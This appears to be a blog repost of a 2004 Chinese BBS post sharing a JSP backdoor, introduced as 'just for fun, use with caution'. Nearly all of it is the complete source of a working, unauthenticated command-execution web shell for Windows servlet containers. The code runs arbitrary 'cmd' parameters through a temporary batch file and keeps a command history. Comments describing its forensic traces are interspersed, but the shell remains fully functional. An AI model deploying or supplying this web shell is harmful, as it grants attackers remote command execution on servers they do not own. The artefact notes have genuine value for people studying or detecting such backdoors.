
秋梦无痕

一场秋雨无梦痕,春夜清风冻煞人。冬来冷水寒似铁,夏至京北蟑满城。


一个jsp后门

发信人: kobe2000 (每一天), 信区: J2EE
标 题: 一个jsp后门
发信站: BBS 水木清华站 (Fri Apr 23 17:19:11 2004), 站内

纯属好玩,请慎重使用。
<%-- Annotated for defensive analysis. This page is a command-execution web shell: it takes a "cmd"
     request parameter, writes it into a temporary batch file and runs that file with whatever OS
     account the servlet container runs under. Nothing on the page authenticates the caller.
     Observable artefacts: a POST/GET parameter named "cmd" sent to a JSP, a short-lived file
     "bat.bat" created in the JVM's working directory, a session attribute named "history", and a
     Runtime.exec() child process spawned from the container. Windows-only (drive letters, .bat,
     backslash paths); response and request charset is GBK. --%>
<%@ page import="java.util.Map, java.util.HashMap, java.util.List, java.util.ArrayList, java.io.*"%>
<%@ page contentType="text/html; charset=GBK" %>
<%!
// JSP declaration block: these are fields of the generated servlet instance, so they are shared
// by every request to this page (not per session). fullpath maps a drive letter to the directory
// the shell is currently "in" on that drive; disk is the drive currently selected.
Map fullpath = new HashMap();
String disk = "C";
%>
<%
// First request initialises drive C to its root.
if(fullpath.size()==0) fullpath.put("C", "\\");
request.setCharacterEncoding("GBK");
// The command to run comes directly from the request; it is only reached when the parameter is present.
String cmd = request.getParameter("cmd");
// sbin collects the child's stdout, sbein its stderr (both already HTML-escaped); e holds the
// message of any exception raised while running the command.
StringBuffer sbin = new StringBuffer(), sbein = new StringBuffer();
String e = null;
if(cmd!=null) {
// Relative path: the file lands in the JVM's current working directory, not in the web root.
// It exists only for the duration of this request (deleted in the finally block below).
File bat = new File("bat.bat");
try {
// The batch file switches to the tracked drive and directory, then runs the raw command.
// Each request spawns a fresh process, which is why the current directory has to be
// tracked in fullpath and replayed here via the "cd" line.
PrintWriter pout = new PrintWriter(new FileWriter(bat));
pout.println("@echo off");
pout.println(disk + ":");
pout.println("cd " + fullpath.get(disk));
pout.println("@echo on");
pout.println(cmd);
pout.flush();
pout.close();
// Child process inherits the identity and environment of the servlet container's JVM.
Process p = Runtime.getRuntime().exec("bat.bat");
BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));
BufferedReader ein = new BufferedReader(new InputStreamReader(p.getErrorStream()));
String s = null;
// stdout is escaped for HTML and has tabs/spaces turned into &nbsp; to keep column layout;
// stderr is only escaped. Reads stdout to EOF before touching stderr.
while((s=in.readLine())!=null) sbin.append(s.replaceAll("<", "&lt;").replaceAll(">", "&gt;").replaceAll("\\\t", "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;").replaceAll(" ", "&nbsp;")+"<br>");
while((s=ein.readLine())!=null) sbein.append(s.replaceAll("<", "&lt;").replaceAll(">", "&gt;")+"<br>");
// A bare "X:" command that produced no stderr output selects drive X for later requests.
if(cmd.length()==2 && cmd.charAt(1)==':' && sbein.length()==0) {
disk = cmd.substring(0,1).toUpperCase();
if(fullpath.get(disk)==null) fullpath.put(disk, "\\");
// A "cd ..." command that produced no stderr output updates the tracked directory for the
// current drive: ".." goes up one component, an absolute path replaces it, anything else is
// appended to the current directory.
} else if(cmd.length()>3 && cmd.substring(0, 3).toUpperCase().equals("CD ") && sbein.length()==0) {
String path = cmd.substring(3, cmd.length());
String oldpath = (String)fullpath.get(disk);
if(path.equals("..")) {
if(!oldpath.equals("\\")) {
path = oldpath.substring(0, oldpath.lastIndexOf("\\"));
if(path.length()==0) path = "\\";
} else
path = oldpath;
} else if(!path.startsWith("\\")) {
while(path.endsWith("\\") || path.endsWith("//")) path = path.substring(0, path.length()-1);
if(oldpath.equals("\\"))
path = "\\" + path;
else
path = oldpath + "\\" + path;
}
fullpath.put(disk, path);
}

// Artefact: every command that produced no stderr output is stored (deduplicated) in the HTTP
// session under the attribute name "history". A session dump will show the commands issued.
if(sbein.length()==0) {
if(session.getAttribute("history")==null) session.setAttribute("history", new ArrayList());
List list = (List)session.getAttribute("history");
if(!list.contains(cmd)) list.add(cmd);
}
} catch(Exception ex) {
e = ex.getMessage();
} finally {
// Removes the batch file even on failure; the file-creation/deletion pair is the on-disk trace.
bat.delete();
}
}
%>
<html><body>
<%-- No action attribute: the form posts back to this same JSP. The prompt shows the tracked
     drive and directory; the stray ">" after the scriptlet is emitted literally as the prompt. --%>
<form method="post">
<%=disk+":"+fullpath.get(disk)%>><input name="cmd" size="30"<%=cmd==null?"":"value='" +cmd + "'"%> onkeydown="getHistory()"><br>
</form>
<script>
<%-- Client-side command history navigation; relies on document.all and the global event object. --%>
document.all("cmd").select();
<%
// Serialises the session's "history" list into a JavaScript array literal, escaping backslashes
// and double quotes; the trailing ", " is trimmed afterwards.
List list = (List)session.getAttribute("history");
StringBuffer sb = new StringBuffer();
if(list!=null) {
for(int i=0; i<list.size(); i++)
sb.append("\""+((String)list.get(i)).replaceAll("\\\\", "\\\\\\\\").replaceAll("\"", "\\\\\"")+ "\", ");
if(sb.length()>0) sb.replace(sb.length()-2, sb.length(), "");
}
%>
var history = [<%=sb%>];
var sel = history.length;
<%-- Up arrow (38) walks backwards through the history, down arrow (40) forwards, both wrapping. --%>
function getHistory() {
if(history.length==0) return;
if(event.keyCode==38) {
sel--;
if(sel<0) sel = history.length-1;
document.all("cmd").value = history[sel];
document.all("cmd").select();
} else if(event.keyCode==40) {
sel++;
if(sel>=history.length) sel = 0;
document.all("cmd").value = history[sel];
document.all("cmd").select();
}
}
</script>
<hr>
<%
// Normal case: stdout followed by stderr. If an exception occurred, only the command text is
// echoed back; the captured exception message in e is never written to the response.
if(e==null) {
out.println(sbin.toString()+sbein.toString());
} else {
out.println(cmd);
}
%>
</body></html>
